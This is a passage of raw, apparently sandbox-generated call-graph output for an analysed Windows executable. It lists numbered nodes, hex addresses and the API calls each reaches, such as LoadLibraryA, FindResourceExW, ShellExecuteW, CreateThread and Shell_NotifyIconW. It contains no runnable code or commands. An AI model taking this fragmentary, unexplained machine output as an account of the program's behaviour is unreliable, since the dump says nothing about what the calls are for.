96772 823605 96770->96772 96773 83fddb 22 API calls 96771->96773 96774 83fe0b 22 API calls 96772->96774 96775 82363b 96773->96775 96774->96771 96775->96658 96776->96653 96839 824e90 LoadLibraryA 96777->96839 96782 824ef6 LoadLibraryExW 96847 824e59 LoadLibraryA 96782->96847 96783 863ccf 96784 824f39 68 API calls 96783->96784 96786 863cd6 96784->96786 96789 824e59 3 API calls 96786->96789 96791 863cde 96789->96791 96790 824f20 96790->96791 96792 824f2c 96790->96792 96869 8250f5 96791->96869 96793 824f39 68 API calls 96792->96793 96795 8244cd 96793->96795 96795->96663 96795->96665 96798 863d05 96800 892d15 96799->96800 96801 82511f 64 API calls 96800->96801 96802 892d29 96801->96802 97012 892e66 96802->97012 96805 8250f5 40 API calls 96806 892d56 96805->96806 96807 8250f5 40 API calls 96806->96807 96808 892d66 96807->96808 96809 8250f5 40 API calls 96808->96809 96810 892d81 96809->96810 96811 8250f5 40 API calls 96810->96811 96812 892d9c 96811->96812 96813 82511f 64 API calls 96812->96813 96814 892db3 96813->96814 96815 84ea0c ___std_exception_copy 21 API calls 96814->96815 96816 892dba 96815->96816 96817 84ea0c ___std_exception_copy 21 API calls 96816->96817 96818 892dc4 96817->96818 96819 8250f5 40 API calls 96818->96819 96820 892dd8 96819->96820 96821 8928fe 27 API calls 96820->96821 96823 892dee 96821->96823 96822 892d3f 96822->96666 96823->96822 97018 8922ce 79 API calls 96823->97018 96825->96678 96827 824f43 96826->96827 96828 824f4a 96826->96828 97019 84e678 96827->97019 96830 824f6a FreeLibrary 96828->96830 96831 824f59 96828->96831 96830->96831 96831->96673 96832->96677 96833->96681 96834->96681 96835->96681 96836->96681 96837->96681 96838->96685 96840 824ec6 96839->96840 96841 824ea8 GetProcAddress 96839->96841 96844 84e5eb 96840->96844 96842 824eb8 96841->96842 96842->96840 96843 824ebf FreeLibrary 96842->96843 96843->96840 96877 84e52a 96844->96877 96846 824eea 96846->96782 96846->96783 96848 824e6e GetProcAddress 96847->96848 96849 824e8d 96847->96849 96850 824e7e 96848->96850 96852 824f80 96849->96852 96850->96849 96851 824e86 FreeLibrary 96850->96851 96851->96849 96853 83fe0b 22 API calls 96852->96853 96854 824f95 96853->96854 96938 825722 96854->96938 96856 824fa1 __fread_nolock 96857 8250a5 96856->96857 96858 863d1d 96856->96858 96862 824fdc 96856->96862 96941 8242a2 CreateStreamOnHGlobal 96857->96941 96952 89304d 74 API calls 96858->96952 96861 863d22 96864 82511f 64 API calls 96861->96864 96862->96861 96863 8250f5 40 API calls 96862->96863 96868 82506e ISource 96862->96868 96947 82511f 96862->96947 96863->96862 96865 863d45 96864->96865 96866 8250f5 40 API calls 96865->96866 96866->96868 96868->96790 96870 825107 96869->96870 96871 863d70 96869->96871 96974 84e8c4 96870->96974 96874 8928fe 96995 89274e 96874->96995 96876 892919 96876->96798 96879 84e536 CallCatchBlock 96877->96879 96878 84e544 96902 84f2d9 20 API calls _abort 96878->96902 96879->96878 96881 84e574 96879->96881 96883 84e586 96881->96883 96884 84e579 96881->96884 96882 84e549 96903 8527ec 26 API calls pre_c_initialization 96882->96903 96894 858061 96883->96894 96904 84f2d9 20 API calls _abort 96884->96904 96888 84e58f 96889 84e595 96888->96889 96890 84e5a2 96888->96890 96905 84f2d9 20 API calls _abort 96889->96905 96906 84e5d4 LeaveCriticalSection __fread_nolock 96890->96906 96891 84e554 __fread_nolock 96891->96846 96895 85806d CallCatchBlock 96894->96895 96907 852f5e EnterCriticalSection 96895->96907 96897 85807b 96908 8580fb 96897->96908 96901 8580ac __fread_nolock 96901->96888 96902->96882 96903->96891 96904->96891 96905->96891 96906->96891 96907->96897 96916 85811e 96908->96916 96909 858088 96922 8580b7 96909->96922 96910 858177 96927 854c7d 20 API calls 2 library calls 96910->96927 96912 858180 96928 8529c8 96912->96928 96915 858189 96915->96909 96934 853405 11 API calls 2 library calls 96915->96934 96916->96909 96916->96910 96916->96916 96925 84918d EnterCriticalSection 96916->96925 96926 8491a1 LeaveCriticalSection 96916->96926 96918 8581a8 96935 84918d EnterCriticalSection 96918->96935 96921 8581bb 96921->96909 96937 852fa6 LeaveCriticalSection 96922->96937 96924 8580be 96924->96901 96925->96916 96926->96916 96927->96912 96929 8529fc __dosmaperr 96928->96929 96930 8529d3 RtlFreeHeap 96928->96930 96929->96915 96930->96929 96931 8529e8 96930->96931 96936 84f2d9 20 API calls _abort 96931->96936 96933 8529ee GetLastError 96933->96929 96934->96918 96935->96921 96936->96933 96937->96924 96939 83fddb 22 API calls 96938->96939 96940 825734 96939->96940 96940->96856 96942 8242d9 96941->96942 96943 8242bc FindResourceExW 96941->96943 96942->96862 96943->96942 96944 8635ba LoadResource 96943->96944 96944->96942 96945 8635cf SizeofResource 96944->96945 96945->96942 96946 8635e3 LockResource 96945->96946 96946->96942 96948 863d90 96947->96948 96949 82512e 96947->96949 96953 84ece3 96949->96953 96952->96861 96956 84eaaa 96953->96956 96955 82513c 96955->96862 96957 84eab6 CallCatchBlock 96956->96957 96958 84eac2 96957->96958 96960 84eae8 96957->96960 96969 84f2d9 20 API calls _abort 96958->96969 96971 84918d EnterCriticalSection 96960->96971 96961 84eac7 96970 8527ec 26 API calls pre_c_initialization 96961->96970 96964 84eaf4 96972 84ec0a 62 API calls 2 library calls 96964->96972 96966 84eb08 96973 84eb27 LeaveCriticalSection __fread_nolock 96966->96973 96968 84ead2 __fread_nolock 96968->96955 96969->96961 96970->96968 96971->96964 96972->96966 96973->96968 96977 84e8e1 96974->96977 96976 825118 96976->96874 96978 84e8ed CallCatchBlock 96977->96978 96979 84e925 __fread_nolock 96978->96979 96980 84e900 ___scrt_fastfail 96978->96980 96981 84e92d 96978->96981 96979->96976 96990 84f2d9 20 API calls _abort 96980->96990 96992 84918d EnterCriticalSection 96981->96992 96983 84e937 96993 84e6f8 38 API calls 4 library calls 96983->96993 96986 84e91a 96991 8527ec 26 API calls pre_c_initialization 96986->96991 96987 84e94e 96994 84e96c LeaveCriticalSection __fread_nolock 96987->96994 96990->96986 96991->96979 96992->96983 96993->96987 96994->96979 96998 84e4e8 96995->96998 96997 89275d 96997->96876 97001 84e469 96998->97001 97000 84e505 97000->96997 97002 84e48c 97001->97002 97003 84e478 97001->97003 97008 84e488 __alldvrm 97002->97008 97011 85333f 11 API calls 2 library calls 97002->97011 97009 84f2d9 20 API calls _abort 97003->97009 97006 84e47d 97010 8527ec 26 API calls pre_c_initialization 97006->97010 97008->97000 97009->97006 97010->97008 97011->97008 97016 892e7a 97012->97016 97013 8928fe 27 API calls 97013->97016 97014 892d3b 97014->96805 97014->96822 97015 8250f5 40 API calls 97015->97016 97016->97013 97016->97014 97016->97015 97017 82511f 64 API calls 97016->97017 97017->97016 97018->96822 97020 84e684 CallCatchBlock 97019->97020 97021 84e695 97020->97021 97022 84e6aa 97020->97022 97032 84f2d9 20 API calls _abort 97021->97032 97029 84e6a5 __fread_nolock 97022->97029 97034 84918d EnterCriticalSection 97022->97034 97024 84e69a 97033 8527ec 26 API calls pre_c_initialization 97024->97033 97027 84e6c6 97035 84e602 97027->97035 97029->96828 97030 84e6d1 97051 84e6ee LeaveCriticalSection __fread_nolock 97030->97051 97032->97024 97033->97029 97034->97027 97036 84e624 97035->97036 97037 84e60f 97035->97037 97042 84e61f 97036->97042 97054 84dc0b 97036->97054 97052 84f2d9 20 API calls _abort 97037->97052 97039 84e614 97053 8527ec 26 API calls pre_c_initialization 97039->97053 97042->97030 97047 84e646 97071 85862f 97047->97071 97050 8529c8 _free 20 API calls 97050->97042 97051->97029 97052->97039 97053->97042 97055 84dc23 97054->97055 97056 84dc1f 97054->97056 97055->97056 97057 84d955 __fread_nolock 26 API calls 97055->97057 97060 854d7a 97056->97060 97058 84dc43 97057->97058 97086 8559be 97058->97086 97061 854d90 97060->97061 97063 84e640 97060->97063 97062 8529c8 _free 20 API calls 97061->97062 97061->97063 97062->97063 97064 84d955 97063->97064 97065 84d976 97064->97065 97066 84d961 97064->97066 97065->97047 97218 84f2d9 20 API calls _abort 97066->97218 97068 84d966 97219 8527ec 26 API calls pre_c_initialization 97068->97219 97070 84d971 97070->97047 97072 858653 97071->97072 97073 85863e 97071->97073 97074 85868e 97072->97074 97079 85867a 97072->97079 97220 84f2c6 20 API calls _abort 97073->97220 97225 84f2c6 20 API calls _abort 97074->97225 97077 858643 97221 84f2d9 20 API calls _abort 97077->97221 97222 858607 97079->97222 97080 858693 97226 84f2d9 20 API calls _abort 97080->97226 97083 84e64c 97083->97042 97083->97050 97084 85869b 97227 8527ec 26 API calls pre_c_initialization 97084->97227 97087 8559ca CallCatchBlock 97086->97087 97088 8559d2 97087->97088 97089 8559ea 97087->97089 97111 84f2c6 20 API calls _abort 97088->97111 97090 855a88 97089->97090 97095 855a1f 97089->97095 97170 84f2c6 20 API calls _abort 97090->97170 97092 8559d7 97112 84f2d9 20 API calls _abort 97092->97112 97113 855147 EnterCriticalSection 97095->97113 97096 855a8d 97171 84f2d9 20 API calls _abort 97096->97171 97099 855a25 97101 855a56 97099->97101 97102 855a41 97099->97102 97100 855a95 97172 8527ec 26 API calls pre_c_initialization 97100->97172 97116 855aa9 97101->97116 97114 84f2d9 20 API calls _abort 97102->97114 97104 8559df __fread_nolock 97104->97056 97107 855a51 97169 855a80 LeaveCriticalSection __wsopen_s 97107->97169 97108 855a46 97115 84f2c6 20 API calls _abort 97108->97115 97111->97092 97112->97104 97113->97099 97114->97108 97115->97107 97117 855ad7 97116->97117 97157 855ad0 97116->97157 97118 855adb 97117->97118 97119 855afa 97117->97119 97173 84f2c6 20 API calls _abort 97118->97173 97122 855b2e 97119->97122 97123 855b4b 97119->97123 97176 84f2c6 20 API calls _abort 97122->97176 97127 855b61 97123->97127 97179 859424 28 API calls __wsopen_s 97123->97179 97124 855cb1 97124->97107 97125 855ae0 97174 84f2d9 20 API calls _abort 97125->97174 97180 85564e 97127->97180 97130 855b33 97177 84f2d9 20 API calls _abort 97130->97177 97132 855ae7 97175 8527ec 26 API calls pre_c_initialization 97132->97175 97136 855b6f 97139 855b95 97136->97139 97140 855b73 97136->97140 97137 855ba8 97142 855c02 WriteFile 97137->97142 97143 855bbc 97137->97143 97138 855b3b 97178 8527ec 26 API calls pre_c_initialization 97138->97178 97188 85542e 45 API calls 3 library calls 97139->97188 97144 855c69 97140->97144 97187 8555e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 97140->97187 97146 855c25 GetLastError 97142->97146 97151 855b8b 97142->97151 97147 855bc4 97143->97147 97148 855bf2 97143->97148 97144->97157 97195 84f2d9 20 API calls _abort 97144->97195 97146->97151 97152 855be2 97147->97152 97153 855bc9 97147->97153 97191 8556c4 7 API calls 2 library calls 97148->97191 97151->97144 97151->97157 97161 855c45 97151->97161 97190 855891 8 API calls 2 library calls 97152->97190 97153->97144 97154 855bd2 97153->97154 97189 8557a3 7 API calls 2 library calls 97154->97189 97156 855be0 97156->97151 97197 840a8c 97157->97197 97160 855c8e 97196 84f2c6 20 API calls _abort 97160->97196 97163 855c60 97161->97163 97164 855c4c 97161->97164 97194 84f2a3 20 API calls __dosmaperr 97163->97194 97192 84f2d9 20 API calls _abort 97164->97192 97167 855c51 97193 84f2c6 20 API calls _abort 97167->97193 97169->97104 97170->97096 97171->97100 97172->97104 97173->97125 97174->97132 97175->97157 97176->97130 97177->97138 97178->97157 97179->97127 97204 85f89b 97180->97204 97182 85565e 97183 855663 97182->97183 97213 852d74 38 API calls 3 library calls 97182->97213 97183->97136 97183->97137 97185 855686 97185->97183 97186 8556a4 GetConsoleMode 97185->97186 97186->97183 97187->97151 97188->97151 97189->97156 97190->97156 97191->97156 97192->97167 97193->97157 97194->97157 97195->97160 97196->97157 97198 840a95 97197->97198 97199 840a97 IsProcessorFeaturePresent 97197->97199 97198->97124 97201 840c5d 97199->97201 97217 840c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97201->97217 97203 840d40 97203->97124 97205 85f8b5 97204->97205 97206 85f8a8 97204->97206 97208 85f8c1 97205->97208 97215 84f2d9 20 API calls _abort 97205->97215 97214 84f2d9 20 API calls _abort 97206->97214 97208->97182 97210 85f8ad 97210->97182 97211 85f8e2 97216 8527ec 26 API calls pre_c_initialization 97211->97216 97213->97185 97214->97210 97215->97211 97216->97210 97217->97203 97218->97068 97219->97070 97220->97077 97221->97083 97228 858585 97222->97228 97224 85862b 97224->97083 97225->97080 97226->97084 97227->97083 97229 858591 CallCatchBlock 97228->97229 97239 855147 EnterCriticalSection 97229->97239 97231 85859f 97232 8585c6 97231->97232 97233 8585d1 97231->97233 97240 8586ae 97232->97240 97255 84f2d9 20 API calls _abort 97233->97255 97236 8585cc 97256 8585fb LeaveCriticalSection __wsopen_s 97236->97256 97238 8585ee __fread_nolock 97238->97224 97239->97231 97257 8553c4 97240->97257 97242 8586c4 97270 855333 21 API calls 2 library calls 97242->97270 97243 8586be 97243->97242 97244 8586f6 97243->97244 97246 8553c4 __wsopen_s 26 API calls 97243->97246 97244->97242 97247 8553c4 __wsopen_s 26 API calls 97244->97247 97249 8586ed 97246->97249 97250 858702 CloseHandle 97247->97250 97248 85871c 97251 85873e 97248->97251 97271 84f2a3 20 API calls __dosmaperr 97248->97271 97252 8553c4 __wsopen_s 26 API calls 97249->97252 97250->97242 97253 85870e GetLastError 97250->97253 97251->97236 97252->97244 97253->97242 97255->97236 97256->97238 97258 8553e6 97257->97258 97259 8553d1 97257->97259 97263 85540b 97258->97263 97274 84f2c6 20 API calls _abort 97258->97274 97272 84f2c6 20 API calls _abort 97259->97272 97262 8553d6 97273 84f2d9 20 API calls _abort 97262->97273 97263->97243 97264 855416 97275 84f2d9 20 API calls _abort 97264->97275 97267 8553de 97267->97243 97268 85541e 97276 8527ec 26 API calls pre_c_initialization 97268->97276 97270->97248 97271->97251 97272->97262 97273->97267 97274->97264 97275->97268 97276->97267 97277->96700 97278 862ba5 97279 822b25 97278->97279 97280 862baf 97278->97280 97306 822b83 7 API calls 97279->97306 97321 823a5a 97280->97321 97284 862bb8 97328 829cb3 97284->97328 97287 822b2f 97297 822b44 97287->97297 97310 823837 97287->97310 97288 862bc6 97289 862bf5 97288->97289 97290 862bce 97288->97290 97293 8233c6 22 API calls 97289->97293 97334 8233c6 97290->97334 97294 862bf1 GetForegroundWindow ShellExecuteW 97293->97294 97300 862c26 97294->97300 97298 822b5f 97297->97298 97320 8230f2 Shell_NotifyIconW ___scrt_fastfail 97297->97320 97304 822b66 SetCurrentDirectoryW 97298->97304 97300->97298 97303 8233c6 22 API calls 97303->97294 97305 822b7a 97304->97305 97352 822cd4 7 API calls 97306->97352 97308 822b2a 97309 822c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97308->97309 97309->97287 97311 823862 ___scrt_fastfail 97310->97311 97353 824212 97311->97353 97314 8238e8 97316 863386 Shell_NotifyIconW 97314->97316 97317 823906 Shell_NotifyIconW 97314->97317 97357 823923 97317->97357 97319 82391c 97319->97297 97320->97298 97322 861f50 __wsopen_s 97321->97322 97323 823a67 GetModuleFileNameW 97322->97323 97324 829cb3 22 API calls 97323->97324 97325 823a8d 97324->97325 97326 823aa2 23 API calls 97325->97326 97327 823a97 97326->97327 97327->97284 97329 829cc2 _wcslen 97328->97329 97330 83fe0b 22 API calls 97329->97330 97331 829cea __fread_nolock 97330->97331 97332 83fddb 22 API calls 97331->97332 97333 829d00 97332->97333 97333->97288 97335 8630bb 97334->97335 97336 8233dd 97334->97336 97338 83fddb 22 API calls 97335->97338 97389 8233ee 97336->97389 97340 8630c5 _wcslen 97338->97340 97339 8233e8 97343 826350 97339->97343 97341 83fe0b 22 API calls 97340->97341 97342 8630fe __fread_nolock 97341->97342 97344 826362 97343->97344 97345 864a51 97343->97345 97404 826373 97344->97404 97414 824a88 22 API calls __fread_nolock 97345->97414 97348 82636e 97348->97303 97349 864a5b 97350 864a67 97349->97350 97351 82a8c7 22 API calls 97349->97351 97351->97350 97352->97308 97354 8635a4 97353->97354 97355 8238b7 97353->97355 97354->97355 97356 8635ad DestroyIcon 97354->97356 97355->97314 97379 88c874 42 API calls _strftime 97355->97379 97356->97355 97358 82393f 97357->97358 97377 823a13 97357->97377 97380 826270 97358->97380 97361 863393 LoadStringW 97364 8633ad 97361->97364 97362 82395a 97363 826b57 22 API calls 97362->97363 97365 82396f 97363->97365 97372 823994 ___scrt_fastfail 97364->97372 97385 82a8c7 97364->97385 97366 82397c 97365->97366 97367 8633c9 97365->97367 97366->97364 97369 823986 97366->97369 97370 826350 22 API calls 97367->97370 97371 826350 22 API calls 97369->97371 97373 8633d7 97370->97373 97371->97372 97375 8239f9 Shell_NotifyIconW 97372->97375 97373->97372 97374 8233c6 22 API calls 97373->97374 97376 8633f9 97374->97376 97375->97377 97378 8233c6 22 API calls 97376->97378 97377->97319 97378->97372 97379->97314 97381 83fe0b 22 API calls 97380->97381 97382 826295 97381->97382 97383 83fddb 22 API calls 97382->97383 97384 82394d 97383->97384 97384->97361 97384->97362 97386 82a8ea __fread_nolock 97385->97386 97387 82a8db 97385->97387 97386->97372 97387->97386 97388 83fe0b 22 API calls 97387->97388 97388->97386 97390 8233fe _wcslen 97389->97390 97391 823411 97390->97391 97392 86311d 97390->97392 97399 82a587 97391->97399 97393 83fddb 22 API calls 97392->97393 97395 863127 97393->97395 97397 83fe0b 22 API calls 97395->97397 97396 82341e __fread_nolock 97396->97339 97398 863157 __fread_nolock 97397->97398 97400 82a598 __fread_nolock 97399->97400 97401 82a59d 97399->97401 97400->97396 97402 86f80f 97401->97402 97403 83fe0b 22 API calls 97401->97403 97403->97400 97406 826382 97404->97406 97411 8263b6 __fread_nolock 97404->97411 97405 864a82 97408 83fddb 22 API calls 97405->97408 97406->97405 97407 8263a9 97406->97407 97406->97411 97409 82a587 22 API calls 97407->97409 97410 864a91 97408->97410 97409->97411 97412 83fe0b 22 API calls 97410->97412 97411->97348 97413 864ac5 __fread_nolock 97412->97413 97414->97349 97415 873a41 97419 8910c0 97415->97419 97417 873a4c 97418 8910c0 53 API calls 97417->97418 97418->97417 97424 8910fa 97419->97424 97425 8910cd 97419->97425 97420 8910fc 97454 83fa11 53 API calls 97420->97454 97421 891101 97430 827510 97421->97430 97424->97417 97425->97420 97425->97421 97425->97424 97428 8910f4 97425->97428 97427 826350 22 API calls 97427->97424 97453 82b270 39 API calls 97428->97453 97431 827525 97430->97431 97448 827522 97430->97448 97432 82755b 97431->97432 97433 82752d 97431->97433 97434 8650f6 97432->97434 97437 82756d 97432->97437 97445 86500f 97432->97445 97455 8451c6 26 API calls 97433->97455 97458 845183 26 API calls 97434->97458 97456 83fb21 51 API calls 97437->97456 97438 82753d 97441 83fddb 22 API calls 97438->97441 97439 86510e 97439->97439 97443 827547 97441->97443 97446 829cb3 22 API calls 97443->97446 97444 865088 97457 83fb21 51 API calls 97444->97457 97445->97444 97447 83fe0b 22 API calls 97445->97447 97446->97448 97449 865058 97447->97449 97448->97427 97450 83fddb 22 API calls 97449->97450 97451 86507f 97450->97451 97452 829cb3 22 API calls 97451->97452 97452->97444 97453->97424 97454->97421 97455->97438 97456->97438 97457->97434 97458->97439 97459 821044 97464 8210f3 97459->97464 97461 82104a 97500 8400a3 29 API calls __onexit 97461->97500 97463 821054 97501 821398 97464->97501 97468 82116a 97469 82a961 22 API calls 97468->97469 97470 821174 97469->97470 97471 82a961 22 API calls 97470->97471 97472 82117e 97471->97472 97473 82a961 22 API calls 97472->97473 97474 821188 97473->97474 97475 82a961 22 API calls 97474->97475 97476 8211c6 97475->97476 97477 82a961 22 API calls 97476->97477 97478 821292 97477->97478 97511 82171c 97478->97511 97482 8212c4 97483 82a961 22 API calls 97482->97483 97484 8212ce 97483->97484 97532 831940 97484->97532 97486 8212f9 97542 821aab 97486->97542 97488 821315 97489 821325 GetStdHandle 97488->97489 97490 862485 97489->97490 97491 82137a 97489->97491 97490->97491 97492 86248e 97490->97492 97494 821387 OleInitialize 97491->97494 97493 83fddb 22 API calls 97492->97493 97495 862495 97493->97495 97494->97461 97549 89011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97495->97549 97497 86249e 97550 890944 CreateThread 97497->97550 97499 8624aa CloseHandle 97499->97491 97500->97463 97551 8213f1 97501->97551 97504 8213f1 22 API calls 97505 8213d0 97504->97505 97506 82a961 22 API calls 97505->97506 97507 8213dc 97506->97507 97508 826b57 22 API calls 97507->97508 97509 821129 97508->97509 97510 821bc3 6 API calls 97509->97510 97510->97468 97512 82a961 22 API calls 97511->97512 97513 82172c 97512->97513 97514 82a961 22 API calls 97513->97514 97515 821734 97514->97515 97516 82a961 22 API calls 97515->97516 97517 82174f 97516->97517 97518 83fddb 22 API calls 97517->97518 97519 82129c 97518->97519 97520 821b4a 97519->97520 97521 821b58 97520->97521 97522 82a961 22 API calls 97521->97522 97523 821b63 97522->97523 97524 82a961 22 API calls 97523->97524 97525 821b6e 97524->97525 97526 82a961 22 API calls 97525->97526 97527 821b79 97526->97527 97528 82a961 22 API calls 97527->97528 97529 821b84 97528->97529 97530 83fddb 22 API calls 97529->97530 97531 821b96 RegisterWindowMessageW 97530->97531 97531->97482 97533 831981 97532->97533 97534 83195d 97532->97534 97558 840242 5 API calls __Init_thread_wait 97533->97558 97541 83196e 97534->97541 97560 840242 5 API calls __Init_thread_wait 97534->97560 97536 83198b 97536->97534 97559 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97536->97559 97539 838727 97539->97541 97561 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97539->97561 97541->97486 97543 821abb 97542->97543 97544 86272d 97542->97544 97546 83fddb 22 API calls 97543->97546 97562 893209 23 API calls 97544->97562 97547 821ac3 97546->97547 97547->97488 97548 862738 97549->97497 97550->97499 97563 89092a 28 API calls 97550->97563 97552 82a961 22 API calls 97551->97552 97553 8213fc 97552->97553 97554 82a961 22 API calls 97553->97554 97555 821404 97554->97555 97556 82a961 22 API calls 97555->97556 97557 8213c6 97556->97557 97557->97504 97558->97536 97559->97534 97560->97539 97561->97541 97562->97548 97564 872a00 97579 82d7b0 ISource 97564->97579 97565 82db11 PeekMessageW 97565->97579 97566 82d807 GetInputState 97566->97565 97566->97579 97567 871cbe TranslateAcceleratorW 97567->97579 97569 82db8f PeekMessageW 97569->97579 97570 82da04 timeGetTime 97570->97579 97571 82db73 TranslateMessage DispatchMessageW 97571->97569 97572 82dbaf Sleep 97593 82dbc0 97572->97593 97573 872b74 Sleep 97573->97593 97574 871dda timeGetTime 97743 83e300 23 API calls 97574->97743 97575 83e551 timeGetTime 97575->97593 97578 872c0b GetExitCodeProcess 97583 872c37 CloseHandle 97578->97583 97584 872c21 WaitForSingleObject 97578->97584 97579->97565 97579->97566 97579->97567 97579->97569 97579->97570 97579->97571 97579->97572 97579->97573 97579->97574 97580 82d9d5 97579->97580 97596 82dfd0 97579->97596 97624 831310 97579->97624 97679 83edf6 97579->97679 97684 82dd50 235 API calls 97579->97684 97685 82bf40 97579->97685 97744 893a2a 23 API calls 97579->97744 97745 82ec40 97579->97745 97769 89359c 82 API calls __wsopen_s 97579->97769 97581 8b29bf GetForegroundWindow 97581->97593 97583->97593 97584->97579 97584->97583 97585 872a31 97585->97580 97586 872ca9 Sleep 97586->97579 97593->97575 97593->97578 97593->97579 97593->97580 97593->97581 97593->97585 97593->97586 97770 8a5658 23 API calls 97593->97770 97771 88e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97593->97771 97772 88d4dc 47 API calls 97593->97772 97598 82e010 97596->97598 97597 872f7a 97599 82ec40 235 API calls 97597->97599 97598->97597 97601 82e075 97598->97601 97600 872f8c 97599->97600 97608 82e0dc ISource 97600->97608 97775 89359c 82 API calls __wsopen_s 97600->97775 97601->97608 97776 840242 5 API calls __Init_thread_wait 97601->97776 97605 872fca 97607 82a961 22 API calls 97605->97607 97605->97608 97606 82a961 22 API calls 97606->97608 97609 872fe4 97607->97609 97608->97606 97616 82ec40 235 API calls 97608->97616 97618 82a8c7 22 API calls 97608->97618 97619 82e3e1 97608->97619 97620 8304f0 22 API calls 97608->97620 97622 89359c 82 API calls 97608->97622 97773 82a81b 41 API calls 97608->97773 97774 83a308 235 API calls 97608->97774 97779 840242 5 API calls __Init_thread_wait 97608->97779 97780 8400a3 29 API calls __onexit 97608->97780 97781 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97608->97781 97782 8a47d4 235 API calls 97608->97782 97783 8a68c1 235 API calls 97608->97783 97777 8400a3 29 API calls __onexit 97609->97777 97613 872fee 97778 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97613->97778 97616->97608 97618->97608 97619->97579 97620->97608 97622->97608 97625 8317b0 97624->97625 97626 831376 97624->97626 97887 840242 5 API calls __Init_thread_wait 97625->97887 97628 876331 97626->97628 97630 831940 9 API calls 97626->97630 97901 8a709c 235 API calls 97628->97901 97629 8317ba 97632 8317fb 97629->97632 97635 829cb3 22 API calls 97629->97635 97633 8313a0 97630->97633 97638 876346 97632->97638 97640 83182c 97632->97640 97636 831940 9 API calls 97633->97636 97634 87633d 97634->97579 97644 8317d4 97635->97644 97637 8313b6 97636->97637 97637->97632 97639 8313ec 97637->97639 97902 89359c 82 API calls __wsopen_s 97638->97902 97639->97638 97663 831408 __fread_nolock 97639->97663 97889 82aceb 97640->97889 97643 831839 97899 83d217 235 API calls 97643->97899 97888 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97644->97888 97647 87636e 97903 89359c 82 API calls __wsopen_s 97647->97903 97648 83152f 97650 8763d1 97648->97650 97651 83153c 97648->97651 97905 8a5745 54 API calls _wcslen 97650->97905 97653 831940 9 API calls 97651->97653 97655 831549 97653->97655 97654 83fddb 22 API calls 97654->97663 97658 831940 9 API calls 97655->97658 97670 8315c7 ISource 97655->97670 97656 831872 97656->97628 97900 83faeb 23 API calls 97656->97900 97657 83fe0b 22 API calls 97657->97663 97666 831563 97658->97666 97659 83171d 97659->97579 97662 82ec40 235 API calls 97662->97663 97663->97643 97663->97647 97663->97648 97663->97654 97663->97657 97663->97662 97664 8763b2 97663->97664 97663->97670 97904 89359c 82 API calls __wsopen_s 97664->97904 97666->97670 97671 82a8c7 22 API calls 97666->97671 97667 831940 9 API calls 97667->97670 97669 83167b ISource 97669->97659 97886 83ce17 22 API calls ISource 97669->97886 97670->97656 97670->97667 97670->97669 97677 824f39 68 API calls 97670->97677 97784 88d4ce 97670->97784 97787 89f0ec 97670->97787 97796 8a959f 97670->97796 97799 896ef1 97670->97799 97879 891e96 97670->97879 97883 8a958b 97670->97883 97906 89359c 82 API calls __wsopen_s 97670->97906 97671->97670 97677->97670 97680 83ee09 97679->97680 97681 83ee12 97679->97681 97680->97579 97681->97680 97682 83ee36 IsDialogMessageW 97681->97682 97683 87efaf GetClassLongW 97681->97683 97682->97680 97682->97681 97683->97681 97683->97682 97684->97579 98299 82adf0 97685->98299 97687 82bf9d 97688 8704b6 97687->97688 97689 82bfa9 97687->97689 98327 89359c 82 API calls __wsopen_s 97688->98327 97691 8704c6 97689->97691 97692 82c01e 97689->97692 98328 89359c 82 API calls __wsopen_s 97691->98328 98304 82ac91 97692->98304 97695 8704f5 97708 87055a 97695->97708 98329 83d217 235 API calls 97695->98329 97696 82c7da 97702 83fe0b 22 API calls 97696->97702 97697 887120 22 API calls 97699 82c039 ISource __fread_nolock 97697->97699 97699->97695 97699->97696 97699->97697 97704 82c808 __fread_nolock 97699->97704 97707 82af8a 22 API calls 97699->97707 97699->97708 97709 87091a 97699->97709 97711 83fddb 22 API calls 97699->97711 97714 82ec40 235 API calls 97699->97714 97715 8708a5 97699->97715 97719 870591 97699->97719 97722 8708f6 97699->97722 97725 82aceb 23 API calls 97699->97725 97726 82c237 97699->97726 97729 82c603 97699->97729 97735 8709bf 97699->97735 97737 82bbe0 40 API calls 97699->97737 97741 83fe0b 22 API calls 97699->97741 98308 82ad81 97699->98308 98332 887099 22 API calls __fread_nolock 97699->98332 98333 8a5745 54 API calls _wcslen 97699->98333 98334 83aa42 22 API calls ISource 97699->98334 98335 88f05c 40 API calls 97699->98335 98336 82a993 41 API calls 97699->98336 97702->97704 97710 83fe0b 22 API calls 97704->97710 97707->97699 97708->97729 98330 89359c 82 API calls __wsopen_s 97708->98330 98339 893209 23 API calls 97709->98339 97740 82c350 ISource __fread_nolock 97710->97740 97711->97699 97714->97699 97716 82ec40 235 API calls 97715->97716 97717 8708cf 97716->97717 97717->97729 98337 82a81b 41 API calls 97717->98337 98331 89359c 82 API calls __wsopen_s 97719->98331 98338 89359c 82 API calls __wsopen_s 97722->98338 97725->97699 97727 82c253 97726->97727 97728 82a8c7 22 API calls 97726->97728 97730 870976 97727->97730 97733 82c297 ISource 97727->97733 97728->97727 97729->97579 97732 82aceb 23 API calls 97730->97732 97732->97735 97734 82aceb 23 API calls 97733->97734 97733->97735 97736 82c335 97734->97736 97735->97729 98340 89359c 82 API calls __wsopen_s 97735->98340 97736->97735 97738 82c342 97736->97738 97737->97699 98315 82a704 97738->98315 97742 82c3ac 97740->97742 98326 83ce17 22 API calls ISource 97740->98326 97741->97699 97742->97579 97743->97579 97744->97579 97763 82ec76 ISource 97745->97763 97746 8400a3 29 API calls pre_c_initialization 97746->97763 97747 83fddb 22 API calls 97747->97763 97748 82fef7 97753 82a8c7 22 API calls 97748->97753 97762 82ed9d ISource 97748->97762 97751 874600 97758 82a8c7 22 API calls 97751->97758 97751->97762 97752 874b0b 98366 89359c 82 API calls __wsopen_s 97752->98366 97753->97762 97756 840242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx 